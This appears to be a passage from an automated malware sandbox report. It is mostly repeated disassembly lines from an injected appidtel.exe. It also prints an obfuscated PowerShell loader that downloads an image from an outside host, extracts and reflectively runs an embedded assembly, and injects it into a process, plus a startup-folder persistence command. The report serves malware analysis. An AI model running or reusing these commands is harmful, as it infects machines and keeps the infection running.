            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343674D mov eax, dword ptr fs:[00000030h]11_2_0343674D
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343674D mov eax, dword ptr fs:[00000030h]11_2_0343674D
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F9730 mov eax, dword ptr fs:[00000030h]11_2_033F9730
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F9730 mov eax, dword ptr fs:[00000030h]11_2_033F9730
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03400750 mov eax, dword ptr fs:[00000030h]11_2_03400750
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442750 mov eax, dword ptr fs:[00000030h]11_2_03442750
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442750 mov eax, dword ptr fs:[00000030h]11_2_03442750
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03484755 mov eax, dword ptr fs:[00000030h]11_2_03484755
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03408770 mov eax, dword ptr fs:[00000030h]11_2_03408770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03410770 mov eax, dword ptr fs:[00000030h]11_2_03410770
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03405702 mov eax, dword ptr fs:[00000030h]11_2_03405702
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03405702 mov eax, dword ptr fs:[00000030h]11_2_03405702
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03407703 mov eax, dword ptr fs:[00000030h]11_2_03407703
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343C700 mov eax, dword ptr fs:[00000030h]11_2_0343C700
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03400710 mov eax, dword ptr fs:[00000030h]11_2_03400710
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03430710 mov eax, dword ptr fs:[00000030h]11_2_03430710
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB765 mov eax, dword ptr fs:[00000030h]11_2_033FB765
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB765 mov eax, dword ptr fs:[00000030h]11_2_033FB765
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB765 mov eax, dword ptr fs:[00000030h]11_2_033FB765
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB765 mov eax, dword ptr fs:[00000030h]11_2_033FB765
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343F71F mov eax, dword ptr fs:[00000030h]11_2_0343F71F
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343F71F mov eax, dword ptr fs:[00000030h]11_2_0343F71F
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03403720 mov eax, dword ptr fs:[00000030h]11_2_03403720
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341F720 mov eax, dword ptr fs:[00000030h]11_2_0341F720
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341F720 mov eax, dword ptr fs:[00000030h]11_2_0341F720
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341F720 mov eax, dword ptr fs:[00000030h]11_2_0341F720
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343C720 mov eax, dword ptr fs:[00000030h]11_2_0343C720
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343C720 mov eax, dword ptr fs:[00000030h]11_2_0343C720
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BF72E mov eax, dword ptr fs:[00000030h]11_2_034BF72E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C972B mov eax, dword ptr fs:[00000030h]11_2_034C972B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034DB73C mov eax, dword ptr fs:[00000030h]11_2_034DB73C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034DB73C mov eax, dword ptr fs:[00000030h]11_2_034DB73C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034DB73C mov eax, dword ptr fs:[00000030h]11_2_034DB73C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034DB73C mov eax, dword ptr fs:[00000030h]11_2_034DB73C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347C730 mov eax, dword ptr fs:[00000030h]11_2_0347C730
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03435734 mov eax, dword ptr fs:[00000030h]11_2_03435734
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340973A mov eax, dword ptr fs:[00000030h]11_2_0340973A
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340973A mov eax, dword ptr fs:[00000030h]11_2_0340973A
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343273C mov eax, dword ptr fs:[00000030h]11_2_0343273C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343273C mov ecx, dword ptr fs:[00000030h]11_2_0343273C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343273C mov eax, dword ptr fs:[00000030h]11_2_0343273C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340C7C0 mov eax, dword ptr fs:[00000030h]11_2_0340C7C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034057C0 mov eax, dword ptr fs:[00000030h]11_2_034057C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034057C0 mov eax, dword ptr fs:[00000030h]11_2_034057C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034057C0 mov eax, dword ptr fs:[00000030h]11_2_034057C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF7BA mov eax, dword ptr fs:[00000030h]11_2_033FF7BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF7BA mov eax, dword ptr fs:[00000030h]11_2_033FF7BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF7BA mov eax, dword ptr fs:[00000030h]11_2_033FF7BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF7BA mov eax, dword ptr fs:[00000030h]11_2_033FF7BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF7BA mov eax, dword ptr fs:[00000030h]11_2_033FF7BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF7BA mov eax, dword ptr fs:[00000030h]11_2_033FF7BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF7BA mov eax, dword ptr fs:[00000030h]11_2_033FF7BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF7BA mov eax, dword ptr fs:[00000030h]11_2_033FF7BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF7BA mov eax, dword ptr fs:[00000030h]11_2_033FF7BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034807C3 mov eax, dword ptr fs:[00000030h]11_2_034807C3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340D7E0 mov ecx, dword ptr fs:[00000030h]11_2_0340D7E0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034227ED mov eax, dword ptr fs:[00000030h]11_2_034227ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034227ED mov eax, dword ptr fs:[00000030h]11_2_034227ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034227ED mov eax, dword ptr fs:[00000030h]11_2_034227ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034047FB mov eax, dword ptr fs:[00000030h]11_2_034047FB
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034047FB mov eax, dword ptr fs:[00000030h]11_2_034047FB
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BF78A mov eax, dword ptr fs:[00000030h]11_2_034BF78A
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034897A9 mov eax, dword ptr fs:[00000030h]11_2_034897A9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348F7AF mov eax, dword ptr fs:[00000030h]11_2_0348F7AF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348F7AF mov eax, dword ptr fs:[00000030h]11_2_0348F7AF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348F7AF mov eax, dword ptr fs:[00000030h]11_2_0348F7AF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348F7AF mov eax, dword ptr fs:[00000030h]11_2_0348F7AF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348F7AF mov eax, dword ptr fs:[00000030h]11_2_0348F7AF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034007AF mov eax, dword ptr fs:[00000030h]11_2_034007AF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342D7B0 mov eax, dword ptr fs:[00000030h]11_2_0342D7B0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D37B6 mov eax, dword ptr fs:[00000030h]11_2_034D37B6
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341C640 mov eax, dword ptr fs:[00000030h]11_2_0341C640
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF626 mov eax, dword ptr fs:[00000030h]11_2_033FF626
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF626 mov eax, dword ptr fs:[00000030h]11_2_033FF626
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF626 mov eax, dword ptr fs:[00000030h]11_2_033FF626
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF626 mov eax, dword ptr fs:[00000030h]11_2_033FF626
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF626 mov eax, dword ptr fs:[00000030h]11_2_033FF626
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF626 mov eax, dword ptr fs:[00000030h]11_2_033FF626
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF626 mov eax, dword ptr fs:[00000030h]11_2_033FF626
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF626 mov eax, dword ptr fs:[00000030h]11_2_033FF626
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF626 mov eax, dword ptr fs:[00000030h]11_2_033FF626
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C866E mov eax, dword ptr fs:[00000030h]11_2_034C866E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C866E mov eax, dword ptr fs:[00000030h]11_2_034C866E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343A660 mov eax, dword ptr fs:[00000030h]11_2_0343A660
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343A660 mov eax, dword ptr fs:[00000030h]11_2_0343A660
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03439660 mov eax, dword ptr fs:[00000030h]11_2_03439660
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03439660 mov eax, dword ptr fs:[00000030h]11_2_03439660
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03432674 mov eax, dword ptr fs:[00000030h]11_2_03432674
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343F603 mov eax, dword ptr fs:[00000030h]11_2_0343F603
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03431607 mov eax, dword ptr fs:[00000030h]11_2_03431607
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341260B mov eax, dword ptr fs:[00000030h]11_2_0341260B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341260B mov eax, dword ptr fs:[00000030h]11_2_0341260B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341260B mov eax, dword ptr fs:[00000030h]11_2_0341260B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341260B mov eax, dword ptr fs:[00000030h]11_2_0341260B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341260B mov eax, dword ptr fs:[00000030h]11_2_0341260B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341260B mov eax, dword ptr fs:[00000030h]11_2_0341260B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341260B mov eax, dword ptr fs:[00000030h]11_2_0341260B
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347E609 mov eax, dword ptr fs:[00000030h]11_2_0347E609
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03403616 mov eax, dword ptr fs:[00000030h]11_2_03403616
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03403616 mov eax, dword ptr fs:[00000030h]11_2_03403616
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442619 mov eax, dword ptr fs:[00000030h]11_2_03442619
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03436620 mov eax, dword ptr fs:[00000030h]11_2_03436620
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03438620 mov eax, dword ptr fs:[00000030h]11_2_03438620
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341E627 mov eax, dword ptr fs:[00000030h]11_2_0341E627
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340262C mov eax, dword ptr fs:[00000030h]11_2_0340262C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D5636 mov eax, dword ptr fs:[00000030h]11_2_034D5636
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340B6C0 mov eax, dword ptr fs:[00000030h]11_2_0340B6C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340B6C0 mov eax, dword ptr fs:[00000030h]11_2_0340B6C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340B6C0 mov eax, dword ptr fs:[00000030h]11_2_0340B6C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340B6C0 mov eax, dword ptr fs:[00000030h]11_2_0340B6C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340B6C0 mov eax, dword ptr fs:[00000030h]11_2_0340B6C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340B6C0 mov eax, dword ptr fs:[00000030h]11_2_0340B6C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C16CC mov eax, dword ptr fs:[00000030h]11_2_034C16CC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C16CC mov eax, dword ptr fs:[00000030h]11_2_034C16CC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C16CC mov eax, dword ptr fs:[00000030h]11_2_034C16CC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C16CC mov eax, dword ptr fs:[00000030h]11_2_034C16CC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343A6C7 mov ebx, dword ptr fs:[00000030h]11_2_0343A6C7
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343A6C7 mov eax, dword ptr fs:[00000030h]11_2_0343A6C7
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BF6C7 mov eax, dword ptr fs:[00000030h]11_2_034BF6C7
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034316CF mov eax, dword ptr fs:[00000030h]11_2_034316CF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F76B2 mov eax, dword ptr fs:[00000030h]11_2_033F76B2
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F76B2 mov eax, dword ptr fs:[00000030h]11_2_033F76B2
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F76B2 mov eax, dword ptr fs:[00000030h]11_2_033F76B2
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FD6AA mov eax, dword ptr fs:[00000030h]11_2_033FD6AA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FD6AA mov eax, dword ptr fs:[00000030h]11_2_033FD6AA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342D6E0 mov eax, dword ptr fs:[00000030h]11_2_0342D6E0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342D6E0 mov eax, dword ptr fs:[00000030h]11_2_0342D6E0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034936EE mov eax, dword ptr fs:[00000030h]11_2_034936EE
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034936EE mov eax, dword ptr fs:[00000030h]11_2_034936EE
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034936EE mov eax, dword ptr fs:[00000030h]11_2_034936EE
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034936EE mov eax, dword ptr fs:[00000030h]11_2_034936EE
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034936EE mov eax, dword ptr fs:[00000030h]11_2_034936EE
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034936EE mov eax, dword ptr fs:[00000030h]11_2_034936EE
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034336EF mov eax, dword ptr fs:[00000030h]11_2_034336EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347E6F2 mov eax, dword ptr fs:[00000030h]11_2_0347E6F2
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347E6F2 mov eax, dword ptr fs:[00000030h]11_2_0347E6F2
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347E6F2 mov eax, dword ptr fs:[00000030h]11_2_0347E6F2
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347E6F2 mov eax, dword ptr fs:[00000030h]11_2_0347E6F2
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034806F1 mov eax, dword ptr fs:[00000030h]11_2_034806F1
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034806F1 mov eax, dword ptr fs:[00000030h]11_2_034806F1
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BD6F0 mov eax, dword ptr fs:[00000030h]11_2_034BD6F0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: amsi64_8004.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8004, type: MEMORYSTR
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\appidtel.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\appidtel.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\appidtel.exe base: 401000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\appidtel.exe base: 2D55008Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = 